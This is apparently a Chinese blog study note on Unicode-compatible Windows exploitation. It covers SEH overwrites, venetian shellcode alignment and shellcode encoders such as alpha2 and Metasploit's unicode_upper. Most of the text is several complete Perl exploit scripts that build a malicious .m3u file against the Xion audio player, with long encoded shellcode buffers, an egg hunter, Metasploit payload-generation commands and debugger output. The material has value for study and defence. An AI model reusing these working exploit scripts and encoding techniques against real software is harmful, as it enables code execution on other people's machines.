• unicode exp学习



    UNICODE  会自动插入NULL字符  

    1)覆盖ret控制

    寻找 形似   0x00nn00mm 的  jmp xxx 的地址  可以jmo 到shellcode执行


    2)基于SEH 控制EIP+SHORT JMP

    寻找 pop pop ret 不包含>7f 的入口地址 用来覆盖SEH header

    先将 nseh 置为 xccxcc  再来寻找   两字节的  short jmp


    3)基于SEH jmp

    不用 short jmp   使用一些无害代码来覆盖NSEH 以使其能够执行到被覆写的SEH 结构之后,

    然后再被执行代码放置于诶覆盖的SEH结构之后,这样跳过nseh + seh之后就执行我们的代码

    需要如下

    (1) 无害指令 放置在 nseh(2)“unicode compatible” 地址用来覆盖 seh hander ,并且执行它不会造成任何伤害

    当 ASCii  码  >7f 时,unicode 转换后都会变为完全不同的值,eg:0x80 -> 1a20 -》  可以构造成0x00nn1a20


    ascii shellcode _> unicode shellcode:

    1) 查找等效 ASCII并跳转到该:

    ascii 被载入内存后,都会变为 unicode,因此在其中找到ascii版本的shellcode,如果能控制EIP 使其跳转到指定地址

    那么就有可能实现exploit。  如果无法到达,那么控制某一寄存器的内容,跳转到那个寄存器,放置一些跳转指令,使其跳转到ASCII版本的shellcode


    2)编写自己的unicode-compatible shellcode


    3)使用编码器

    将ASCII-》unicode  并在其前端放上解码器,经解码后 就可以生产原始 代码并执行了

    (1)通过特定的内存地址上重构原始代码,然后跳转到那个地址

    其中某个寄存器必须指向 decoder+shellcode 的入口地址,另一个寄存器必须指向可写的内存地址(shellcode)

    (2)通过改变代码执行流程,使其运行到重构的shellcode上

    使用一个指向 decoder+shellcode的入口地址的寄存器即可,同时让原始shellcode经重构后保存在该处


    工具学习:

    1)makeunicode2.py 不会····

    2)vense.pl   下载地址: http://www.phenoelit-us.org/win

    生成一字节 字符串,包含decoder+原始shellcode,,为了使用docoder,还需要设置 寄存器

    1个寄存器直接指向 buffer 入口地址  用于存放vense.pl 生成的shellcode 2 个寄存器需要指向一段可写可执行 的内存地址,能够向内写入数据

    shellcode 入口地址 = eax       可写地址 = edi


    改写   $secondstage   为   metasploit 生成的perl shellcode  并解码后可以正常执行


    运行脚本  1)显示原始 shellcode  2)新生成的shellcode 包含decoder

    将新生成shellcode放入 exploit   确保 eax->shellcode 入口地址  !!!这里需要重新调整寄存器,并视同unicode-compatible代码实现跳转 ,方法点击这里,

    寄存器设置好了之后,运行  jmp eax ,解码器就是提取出原始的shellcode 并执行它


    注意:

    (1)不能再不是UNIICODE EXP 上运用   (2)虽然脚本中使用算法是经makeunicode2改善后的版本,但依然会生成很长的shellcode,所以要求的缓冲区很大


    3)alpha2 下载地址: http://download.csdn.net/detail/hksoobe/4803452

    同时也包含在 MSF中,将会把shellcode包裹在 decoder 之中  

    (1)只需要指定 shellcode入口的寄存器,唔需要指向可写可执行地址的寄存器

    (2)decoder 并不包含在原来代码中,decoder可自我修改,而且要求的缓冲区空间也比较小

    MSF中的没下载不用··························

    root@bt:~/Desktop# ./alpha2 eax --unicode --uppercase < 1.bin

    root@bt:~/Desktop# ./alpha2 --help
    Usage: ./alpha2 [OPTION] [BASEADDRESS]
    ALPHA 2 encodes your IA-32 shellcode to contain only alphanumeric characters.
    The result can optionaly be uppercase-only and/or unicode proof. It is a encoded
    version of your origional shellcode. It consists of baseaddress-code with some
    padding, a decoder routine and the encoded origional shellcode. This will work
    for any target OS. The resulting shellcode needs to have RWE-access to modify
    it's own code and decode the origional shellcode in memory.
    
    BASEADDRESS
      The decoder routine needs have it's baseaddress in specified register(s). The
      baseaddress-code copies the baseaddress from the given register or stack
      location into the apropriate registers.
    eax, ecx, edx, ecx, esp, ebp, esi, edi
      Take the baseaddress from the given register. (Unicode baseaddress code using
      esp will overwrite the byte of memory pointed to by ebp!)
    [esp], [esp-X], [esp+X]
      Take the baseaddress from the stack.
    seh
      The windows "Structured Exception Handler" (seh) can be used to calculate
      the baseaddress automatically on win32 systems. This option is not available
      for unicode-proof shellcodes and the uppercase version isn't 100% reliable.
    nops
      No baseaddress-code, just padding.  If you need to get the baseaddress from a
      source not on the list use this option (combined with --nocompress) and
      replace the nops with your own code. The ascii decoder needs the baseaddress
      in registers ecx and edx, the unicode-proof decoder only in ecx.
    -n
      Do not output a trailing newline after the shellcode.
    --nocompress
      The baseaddress-code uses "dec"-instructions to lower the required padding
      length. The unicode-proof code will overwrite some bytes in front of the
      shellcode as a result. Use this option if you do not want the "dec"-s.
    --unicode
      Make shellcode unicode-proof. This means it will only work when it gets
      converted to unicode (inserting a '0' after each byte) before it gets
      executed.
    --uppercase
      Make shellcode 100% uppercase characters, uses a few more bytes then
      mixedcase shellcodes.
    --sources
      Output a list of BASEADDRESS options for the given combination of --uppercase
      and --unicode.
    --help
      Display this help and exit
    --version
      Output version information and exit
    
    See the source-files for further details and copying conditions. There is NO
    warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
    
    Acknowledgements:
      Thanks to rix for his phrack article on aphanumeric shellcode.
      Thanks to obscou for his phrack article on unicode-proof shellcode.
      Thanks to Costin Ionescu for the idea behind w32 SEH GetPC code.
    
    Report bugs to <skylined@edup.tudelft.nl>



    4) metasploit

    root@bt:/opt/framework/msf3# ./msfpayload windows/exec  CMD=calc R |
    > ./msfencode -e x86/alpha_mixed -t raw | 
    > ./msfencode -e x86/unicode_upper BufferRegister=EAX -t perl
    [*] x86/alpha_mixed succeeded with size 454 (iteration=1)
    
    [*] x86/unicode_upper succeeded with size 1039 (iteration=1)
    
    my $buf = 
    "x50x50x59x41x49x41x49x41x49x41x49x41x51x41" .
    "x54x41x58x41x5ax41x50x55x33x51x41x44x41x5a" .
    "x41x42x41x52x41x4cx41x59x41x49x41x51x41x49" .
    "x41x51x41x50x41x35x41x41x41x50x41x5ax31x41" . 省略····
    

    1)只能有一套限定的指令集

    2)避免NULL 字符,要求添加NULL后的shellcode仍然可正常运行

    3)机器码对齐问题


    venetian shellcode  技术

    确保NULL和指令以正确的放上对齐

    单字节转换为UNICODE编码时不被 破坏寄存器或者指令   还不行的话  查看 http://phrack.org/issues/61/11.html#article

    00 6e 00:add byte ptr [esi],ch
    00 6f 00:add byte ptr [edi],ch
    00 70 00:add byte ptr [eax],ch
    00 71 00:add byte ptr [ecx],ch
    00 72 00:add byte ptr [edx],ch
    00 73 00:add byte ptr [ebx],ch
    00 62 00:add byte ptr [edx],ah
    00 6d 00:add byte ptr [ebp],ch



    1)假设ESI  指向可写地址

    假设 ASCII 版本的shellcode 在    0x33445566,eax 写入它  perl 脚本:

     my $align = "xb8x44xaa";        #mov eax,0x0AA004400
    $align=$align."x6e";        #nop/align nullbytes
    $align=$align."x50";                   #push eax
    $align=$align."x6e";        #nop/align nullbytes
    $align=$align."x4c";                   #dec esp
    $align=$align."x6e";        #nop/align nullbytes
    $align=$align."x58";                   #pop eax                     ,eax=0x004400??
    $align=$align."x6e";        #nop/align nullbytes
    $align=$align."x05x55x33";      #add eax,33005500h  ,eax=0x334455??
    $align=$align."x6e";        #nop/align nullbytes
    $align=$align."xb0";                   #mov al,0
    #no alignment needed between these 2!
    $align=$align."xb9x66xaa";      #mov ecx,AA006600h ,eax =0x33445500

    $align=$align."xe8";                   #add al,ch                   ,eax =0x33445566

    #现在  ASCII 版本的shellcode 传入  unicode 编码的 程序中执行上述指令,EAX 就可以被成功赋值为 0x33445566

    #接下来就是  jmp eax

    $align=$align."xe8";                   #add al,ch                   ,eax =0x33445566

    $align=$align."x6e";        #nop/align nullbytes

    !!!注意  这里  有一个错误  0xc3 转换为unicode时不慎0xc3了

    所以一般直接走到shellcode  

    但是 http://bbs.pediy.com/showthread.php?t=126344

    说的有可能构造出 c3   

    'x72xcbx72'  #ret 转换成'x72x00xc3x85x41x00'


    2) 假设  ebp+0x100 放入eax  之后调到EAX 去执行代码,那么就先写入一些汇编指令

    00401580 >    55            push ebp
    00401581      58            pop eax
    00401582      05 00140011   add eax,0x11001400
    00401587      2D 00130011   sub eax,0x11001300  EBP+0x100

    利用 venetian shellcode 技术构造 以上代码  

    x6e                 #nop/align nullbytes

    x55                 #push ebp

    x6e                 #nop/align nullbytes

    x58                 #pop eax

    x6e                 #nop/align nullbytes

    x05x14x11  #add eax,0x11001400

    x6e                 #nop/align nullbytes

    x2dx13x11  #sub eax,0x11001300

    x6e                 #nop/align nullbytes



    这里准备一个例子  :  xion 1.0 build120:



    用OD调试出来是 0x235


    然后 

    !pvefindaddr p2

    #Found pop esi - pop ebx - ret at 0x0043003B [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files 2 StudiosXionXion.exe
    #Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files 2 StudiosXionXion.exe
    #Found pop edi - pop esi - ret at 0x00480063 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files 2 StudiosXionXion.exe

    不能要  >7f 的字节

    这里选择 0x00470034 


    下来这个是WINDBG找出来的,还不算成功呢     调试才能成功运行shellcode

    my $file = "test.m3u";
    #my $junk = "A"x270;
    
    
    my $nseh = "x61x62";#61 is popad 62为align bytes
    my $seh =  "x34x47";#"x34x47";pop pop ret
    #Found pop esi - pop ebx - ret at 0x0043003B [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files
    2 StudiosXionXion.exe
    #Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files
    2 StudiosXionXion.exe
    #Found pop edi - pop esi - ret at 0x00480063 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files
    2 StudiosXionXion.exe
    
    
    my $VenetianShellcode ="x6e";
     $VenetianShellcode =$VenetianShellcode."x55";#55            push ebp
     $VenetianShellcode =$VenetianShellcode."x6e";
     $VenetianShellcode =$VenetianShellcode."x58";#58            pop eax
     $VenetianShellcode =$VenetianShellcode."x6e";
     $VenetianShellcode =$VenetianShellcode."x05x14x11";#05 00140011   add eax,0x11001400
     $VenetianShellcode =$VenetianShellcode."x6e";
     $VenetianShellcode =$VenetianShellcode."x2dx13x11";#2D 00130011   sub eax,0x11001300  EBP+0x100
     $VenetianShellcode =$VenetianShellcode."x6e";
    #229fe54 - 229fd76 = DE = 222  just need 111  不能用push eax ret  c3不能正确转换为c3
    
                             #1)"x43x6e" inc ebx ,add byte ptr [esi],ch 
    my $junk2  = "x70"x111; #2)"x70"   jo xxx   1,2都可以用来作为nop来对齐地址为eax ,指向shellcode第一字节
    #缓冲区为 1840bits  从这里开始   而shellcode为 1037bits *2 = 2074  所以shellcode分为两段
    my $buf = 
    "x50x50x59x41x49x41x49x41x49x41x49x41x51x41" .
    "x54x41x58x41x5ax41x50x55x33x51x41x44x41x5a" .
    "x41x42x41x52x41x4cx41x59x41x49x41x51x41x49" .
    "x41x51x41x50x41x35x41x41x41x50x41x5ax31x41" .
    "x49x31x41x49x41x49x41x4ax31x31x41x49x41x49" .
    "x41x58x41x35x38x41x41x50x41x5ax41x42x41x42" .
    "x51x49x31x41x49x51x49x41x49x51x49x31x31x31" .
    "x31x41x49x41x4ax51x49x31x41x59x41x5ax42x41" .
    "x42x41x42x41x42x41x42x33x30x41x50x42x39x34" .
    "x34x4ax42x43x59x5ax42x49x49x58x4bx5ax39x52" .
    "x52x4bx44x52x39x51x39x51x39x51x39x51x39x51" .
    "x39x51x39x50x49x51x39x51x39x51x39x50x49x51" .
    "x33x50x43x50x43x51x33x51x33x51x33x50x37x50" .
    "x51x50x5ax52x4ax51x31x50x58x52x30x50x30x51" .
    "x31x50x30x51x31x52x4bx51x31x51x31x52x31x50" .
    "x32x51x31x51x32x50x32x50x42x51x32x50x30x51" .
    "x32x51x32x51x31x50x42x52x38x50x50x50x38x51" .
    "x31x51x32x43x45x50x4ax50x49x50x49x52x4cx50" .
    "x58x43x38x50x4bx50x39x51x37x54x30x50x43x50" .
    "x30x50x45x52x30x52x31x54x30x50x4cx51x39x50" .
    "x4dx50x35x52x30x50x31x52x38x51x42x51x33x52" .
    "x34x50x4ex52x4bx50x50x52x32x50x56x50x50x50" .
    "x4cx50x4bx52x32x52x52x52x34x50x4cx50x4ex52" .
    "x4bx52x30x51x42x50x56x43x44x50x4cx50x4bx50" .
    "x50x43x42x50x51x50x38x51x46x52x4fx50x4dx52" .
    "x47x50x43x43x4ax52x36x50x46x50x56x52x31x50" .
    "x49x52x4fx50x56x50x51x50x4bx52x50x50x4cx52" .
    "x4cx51x35x52x4cx50x51x52x51x50x51x52x4cx52" .
    "x34x51x32x51x46x50x4cx50x45x52x50x50x4bx52" .
    "x51x52x38x50x4fx50x56x52x4dx51x33x50x31x51" .
    "x48x51x37x50x4dx50x32x50x5ax52x30x52x36x50" .
    "x32x50x52x54x37x50x4ex52x4bx52x31x51x32x50" .
    "x56x52x50x50x4cx50x4bx50x52x43x32x51x35x52" .
    "x4cx51x35x52x31x50x58x50x50x50x4cx50x4bx50" .
    "x43x52x50x52x31x51x58x50x4fx52x55x50x4bx54" .
    "x30x52x31x43x34x51x33x52x5ax51x46x51x51x50" .
    "x5ax52x50x51x46x50x30x50x4cx50x4bx50x43x54" .
    "x38x50x56x43x48x50x4ex52x4bx50x50x50x58x50" .
    "x51x50x30x51x37x54x31x50x4bx51x53x51x39x52" .
    "x53x50x47x50x4cx50x52x43x39x50x4cx50x4bx51" .
    "x35x43x34x50x4cx50x4bx50x47x54x31x50x5ax54" .
    "x36x50x45x43x31x51x39x52x4fx50x50x50x31x50" .
    "x4bx52x50x50x4cx52x4cx50x5ax43x31x52x38x50" .
    "x4fx51x44x50x4dx51x33x50x31x52x38x50x47x50" .
    "x47x51x38x50x4bx50x50x52x30x43x45x50x5ax50" .
    "x54x50x56x43x33x50x43x50x4dx50x58x54x38x50" .
    "x47x50x4bx52x31x52x4dx51x35x43x44x52x34x50" .
    "x35x50x5ax50x42x51x46x50x38x50x4ex52x4bx52" .
    "x36x50x38x51x46x51x34x51x37x54x31x51x4ax54" .
    "x33x50x50x52x46x50x4cx50x4bx50x54x50x4cx52" .
    "x30x50x4bx50x4ex52x4bx50x56x50x38x51x35x50" .
    "x4cx50x47x52x51x51x48x50x53x50x4ex52x4bx50" .
    "x47x54x34x50x4cx50x4bx51x46x51x51x52x38x52" .
    "x30x50x4fx54x39x52x30x51x34x50x47x52x34x50" .
    "x54x43x34x50x43x52x4bx52x31x50x4bx50x51x54" .
    "x31x52x30x50x59x50x50x50x5ax51x33x43x31x51" .
    "x39x52x4fx50x4bx52x30x50x50x52x38x51x33x52" .
    "x4fx51x42x52x5ax50x4ex52x4bx50x45x50x42x51" .
    "x48x52x4bx50x4ex52x46x52x31x50x4dx52x30x51" .
    "x5ax51x33x50x31x50x4cx50x4dx50x4ex52x45x50" .
    "x4ex50x59x50x47x52x50x50x45x52x30x50x45x50" .
    "x50x50x56x50x30x50x45x50x38x52x34x54x31x50" .
    "x4ex52x4bx52x32x50x4fx50x4cx50x47x50x4bx50" .
    "x4fx50x58x50x55x50x4dx52x4bx51x48x52x50x50" .
    "x4ex50x55x50x4ex50x42x51x42x43x46x51x33x51" .
    "x48x51x39x50x36x50x4dx50x45x50x4dx52x4dx50" .
    "x4fx52x4dx50x4bx50";
    
    #junk 
    my $junk = 
    "x4fx50x4bx51x55x50x45x52" .
    "x4cx51x33x50x36x50x51x52x4cx52x36x51x5ax50" .
    "x4fx54x30x50x4bx50x4bx50x4bx52x30x52x32x52" .
    "x35x51x37x52x55x50x4fx50x4bx52x31x50x57x52" .
    "x32x50x33x50x50x43x42x50x50x52x4fx51x42x50" .
    "x4ax51x35x52x30x50x56x50x33x51x39x52x4fx51" .
    "x39x51x35x50x45x50x33x50x51x54x31x52x30x52" .
    "x4cx50x43x50x53x51x35x52x30x51x31x51x31x41" .
    "x41";
    $junk = $junk."A"x(270-length($junk));
    
    my $junk3 = "x42"x(5000-length($junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf));
    
    my $payload = $junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf.$junk3;
    open($FILE,">$file");  
    print $FILE $payload;  
    close($FILE);  


    运用自己的shellcode   加密成为  unicode  能用的shellcode

    root@bt:/opt/framework/msf3# cat exploit.m3u |   ./msfencode -e x86/alpha_mixed -t raw |    ./msfencode -e x86/unicode_upper BufferRegister=EAX -t perl
    [*] x86/alpha_mixed succeeded with size 277 (iteration=1)
    
    
    [*] x86/unicode_upper succeeded with size 685 (iteration=1)
    
    
    my $buf = 
    "x50x50x59x41x49x41x49x41x49x41x49x41x51x41" .···省略

    下面这个才是正确的 POC   问题在于:  windbg和OD(正常) 的调试出来的POC不一样这是怎么一回事呢

    而且windbg调试出来的POC 肯定是错误的!   OD调试出来的才是正确的


    1)  寻找  unicode 形式的  pop pop ret    覆盖  SEH handler         !pvefindaddr p2  可以找到

    2)  nseh 用 popad  可以得到   寄存器+偏移   指向 我们输入的字符串某一位置

    3)  构造  VenetianShllcode  使得  eax = 我们输入的字符串某一位置

    4)  构造 nop/align  得到  eax= shellcode起始第一字节 

    5)  用生成的unicode shellcode  ,  eax = shellcode起始 ,执行shellcode  shellcode = 解码器+代码  

    my $file = "test.m3u";#perl
    #my $junk = "A"x270;
    
    
    my $nseh = "x61x62";#61 is popad 62为align bytes
    my $seh =  "x34x47";#"x34x47";pop pop ret
    #Found pop esi - pop ebx - ret at 0x0043003B [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files
    2 StudiosXionXion.exe
    #Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files
    2 StudiosXionXion.exe
    #Found pop edi - pop esi - ret at 0x00480063 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files
    2 StudiosXionXion.exe
    
    
    my $VenetianShellcode ="x6e";
     $VenetianShellcode =$VenetianShellcode."x55";#55            push ebp
     $VenetianShellcode =$VenetianShellcode."x6e";
     $VenetianShellcode =$VenetianShellcode."x58";#58            pop eax
     $VenetianShellcode =$VenetianShellcode."x6e";
     $VenetianShellcode =$VenetianShellcode."x05x14x11";#05 00140011   add eax,0x11001400
     $VenetianShellcode =$VenetianShellcode."x6e";
     $VenetianShellcode =$VenetianShellcode."x2dx13x11";#2D 00130011   sub eax,0x11001300  EBP+0x100
     $VenetianShellcode =$VenetianShellcode."x6e";
    #229fe54 - 229fd76 = DE = 222  just need 111  不能用push eax ret  c3不能正确转换为c3
    
    my $junk2  =  "x48x6e"x42;               #1)"x43x6e" inc ebx ,add byte ptr [esi],ch 
     $junk2  = $junk2."x70"x6; #2)"x70"   jo xxx   1,2都可以用来作为nop来对齐地址为eax ,指向shellcode第一字节
    #缓冲区为 1840bits  从这里开始   而shellcode为 1037bits *2 = 2074  所以shellcode分为两段
    my $buf = 
    "x50x50x59x41x49x41x49x41x49x41x49x41x51x41" .
    "x54x41x58x41x5ax41x50x55x33x51x41x44x41x5a" .
    "x41x42x41x52x41x4cx41x59x41x49x41x51x41x49" .
    "x41x51x41x50x41x35x41x41x41x50x41x5ax31x41" .
    "x49x31x41x49x41x49x41x4ax31x31x41x49x41x49" .
    "x41x58x41x35x38x41x41x50x41x5ax41x42x41x42" .
    "x51x49x31x41x49x51x49x41x49x51x49x31x31x31" .
    "x31x41x49x41x4ax51x49x31x41x59x41x5ax42x41" .
    "x42x41x42x41x42x41x42x33x30x41x50x42x39x34" .
    "x34x4ax42x45x39x5ax46x58x59x58x4ex58x59x54" .
    "x36x4bx44x50x59x51x39x50x49x50x49x51x39x51" .
    "x39x51x39x50x49x50x49x50x49x51x39x51x39x51" .
    "x33x51x33x50x43x51x33x50x43x51x33x50x37x50" .
    "x51x51x4ax52x4ax51x31x52x38x52x30x50x30x51" .
    "x31x50x30x51x31x52x4bx51x31x51x31x50x51x50" .
    "x32x51x31x51x32x50x32x51x32x51x32x50x30x51" .
    "x32x51x32x51x31x50x42x51x48x52x30x50x38x51" .
    "x31x50x42x43x45x50x4ax51x39x52x30x50x31x50" .
    "x5ax52x52x51x48x50x32x50x54x54x30x52x32x51" .
    "x34x50x4ex52x4bx51x44x52x32x50x4cx50x4bx50" .
    "x51x51x32x52x36x52x4cx50x4cx50x4bx51x33x51" .
    "x52x51x37x52x4cx50x4ex52x4bx50x51x50x52x50" .
    "x47x43x48x50x4ex52x4bx52x34x50x32x50x47x50" .
    "x50x50x4cx50x4bx52x36x54x32x50x4fx52x50x50" .
    "x51x52x4ex50x56x52x4cx51x35x43x33x52x34x50" .
    "x35x51x39x52x42x50x4cx50x49x52x38x51x37x50" .
    "x43x50x33x50x51x51x58x50x47x50x4cx50x4cx50" .
    "x4bx52x30x50x57x52x32x50x58x50x45x50x51x50" .
    "x4fx50x32x50x4ex52x4bx50x51x52x4ax51x37x50" .
    "x50x51x35x50x51x50x4bx43x47x52x34x52x51x52" .
    "x38x52x4dx50x4cx50x4bx51x35x52x44x50x4ex50" .
    "x4fx50x43x50x31x50x4bx54x36x50x52x52x45x50" .
    "x4fx54x31x51x37x50x4ex51x37x50x36x52x30x51" .
    "x51x52x31x52x44x51x35x50x31x52x34x50x35x50" .
    "x49x43x32x50x4bx50x31x52x31x52x4ex50x54x50" .
    "x48x51x37x50x35x52x30x43x48x52x30x43x39x51" .
    "x42x51x44x52x30x52x55x50x58x52x49x50x4ex52" .
    "x4bx50x43x50x4ax51x44x52x44x51x33x50x31x50" .
    "x4fx50x37x50x50x43x36x50x4ex52x4bx51x46x50" .
    "x4cx52x30x52x4fx50x4cx50x4bx51x33x50x4ax50" .
    "x47x52x4cx50x45x50x51x50x4fx50x37x50x4cx50" .
    "x4bx50x43x50x4cx50x4ex50x4fx51x39x52x4cx51" .
    "x46x43x31x51x48x50x47x50x52x51x38x50x43x51" .
    "x44x50x43x50x51x50x43x52x50x51x37x54x31x52" .
    "x30x43x38x50x47x50x30x50x54x50x30x51x35x50" .
    "x31x50x52x50x4ex50x4bx50x39x50x4dx50x31x50" .
    "x4bx50x4ex52x32x43x39x50x45x50x57x51x44x54" .
    "x31x50x4bx54x30x50x56x50x31x52x30x50x50x50" .
    "x4bx50x4fx50x5ax54x37x51x31x51x31x41x41";
    
    #junk 
    $junk = "A"x235;
    
    my $junk3 = "x42"x(5000-length($junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf));
    
    my $payload = $junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf.$junk3;
    open($FILE,">$file");  
    print $FILE $payload;  
    close($FILE);  

    下面构造  unicode 版本的 egg hunting   egg hunting 可以解决  字符不够用的情况 ,将会覆盖 shellcode到其他地方  然后去找寻 执行



    构造shellcode

    root@xxx:/opt/framework/msf3# ./msfpayload windows/messagebox TEXT="#pand0#" TITLE="#pand0#" R > /root/Desktop/1.bin

    ···········································

    root@bt:~/Desktop# ./alpha2 eax --unicode --uppercase < 1.bin
    PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1A`````````````````````````


    my $file = "test.m3u";#perl  
    #my $junk = "A"x270;  
      
      
    my $nseh = "x61x62";#61 is popad 62为align bytes  
    my $seh =  "x34x47";#"x34x47";pop pop ret  
    #Found pop esi - pop ebx - ret at 0x0043003B [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files
    2 StudiosXionXion.exe  
    #Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files
    2 StudiosXionXion.exe  
    #Found pop edi - pop esi - ret at 0x00480063 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files
    2 StudiosXionXion.exe  
      
      
    my $VenetianShellcode ="x6e";  
     $VenetianShellcode =$VenetianShellcode."x55";#55            push ebp  
     $VenetianShellcode =$VenetianShellcode."x6e";  
     $VenetianShellcode =$VenetianShellcode."x58";#58            pop eax  
     $VenetianShellcode =$VenetianShellcode."x6e";  
     $VenetianShellcode =$VenetianShellcode."x05x14x11";#05 00140011   add eax,0x11001400  
     $VenetianShellcode =$VenetianShellcode."x6e";  
     $VenetianShellcode =$VenetianShellcode."x2dx13x11";#2D 00130011   sub eax,0x11001300  EBP+0x100  
     $VenetianShellcode =$VenetianShellcode."x6e";  
    #229fe54 - 229fd76 = DE = 222  just need 111  不能用push eax ret  c3不能正确转换为c3  
      
    my $junk2  =  "x48x6e"x42;               #1)"x43x6e" inc ebx ,add byte ptr [esi],ch   
     $junk2  = $junk2."x70"x6; #2)"x70"   jo xxx   1,2都可以用来作为nop来对齐地址为eax ,指向shellcode第一字节  
    #缓冲区为 1840bits  从这里开始   而shellcode为 1037bits *2 = 2074  所以shellcode分为两段  
    my $egghunter = 
    "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBQVU1XJKOLOQ2R2QZLB0X8MNNOLM5QJ44JO6XM0P0KPT44KKJ6O45IZFO3EJGKOIWA";
    #egg 用 x00x30x00x74
    $junk2 = $junk2.$egghunter;
    my $garbage = "X"x100; #########################################################垃圾代码############################################
    
    my $aligin = "x6d".
    "x57".  #push edi
    "x6d".
    "x58".  #pop eax
    "x6d".
    "x05x14x11".#05 00140011   add eax,0x11001400  
    "x6d".
    "x2dx13x11".#2D 00130011   sub eax,0x11001300  eax+0x100  
    "x6d".  
    "x40".  #inc eax
    "x6d".
    "x70"x113;#注意相加减得到的差 要除2 
    
    my $buf =("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBYIZKUKXYRTMTJTNQZ27BSGNQ8I34TKD1NPDK46LLDKRVML4KQ6LHTK3NO04KNVOHPOMHBUL3PYKQXQKO9QQP4K2LMTO4TKPEOL4K1DMXBXM1ZJ4KOZN84KPZMPKQJKK3P4Q9DKNT4KKQZNNQKONQY0KLVLU47PBTKWWQXOLMM1WWJKJTOK3LNDMX459QDK1JMTM1JK36TKLL0KDKQJMLM1ZKTKLDTKKQJHTIOTO4MLQQ8C7BLHMYHTSYK5E9WRS8TN0NLNZL22IXUOKOKOKOU9OULDWKCNIHZB3CTGMLMT22YXDNKOKOKOU9PEKXBH2LBLO011RHP3P2NN1TQXRU2SC52R4H1LO4KZ3YJFPVKO25KTE98B20WKUX6B0MWL4GMLND229X1QKOKOKO1X1TP0MSQHQXMS2P1QBNNQIKCX1LO4KW4IYSQX1T00MS28QXNC2P1Q2NNQI9THPLNDKWCYYQNQZ21BPSR1PRKOXPNQWPB0KO0ULHA");
    #panda0#
    $junk = "A"x235;   
    
    my $junk3 = "x42"x(5000-length($junk.$nseh.$seh.$VenetianShellcode.$junk2.$garbage."0t0t".$aligin.$buf));  
      
    my $payload = $junk.$nseh.$seh.$VenetianShellcode.$junk2.$garbage."0t0t".$aligin.$buf.$junk3;  
    open($FILE,">$file");    
    print $FILE $payload;    
    close($FILE);    





















  • 相关阅读:
    优酷土豆的Redis服务平台化之路
    [C#]使用Gembox.SpreadSheet向Excel写入数据及图表
    [C#]使用Join与GroupJoin将两个集合进行关联与分组
    [C#]使用TcpListener及TcpClient开发一个简单的Chat工具
    超棒黑客必备清单
    [C#]使用dnSpy对目标程序(EXE或DLL)进行反编译修改并编译运行
    [C#源代码]使用SCPI指令对通信端口(RS232/USB/GPIB/LAN)进行仪器编程
    [C#]使用Costura.Fody将源DLL合并到目标EXE
    [C#]使用ILMerge将源DLL合并到目标EXE(.NET4.6.2)
    详解C#7.0新特性
  • 原文地址:https://www.cnblogs.com/zcc1414/p/3982354.html
Copyright © 2020-2023  润新知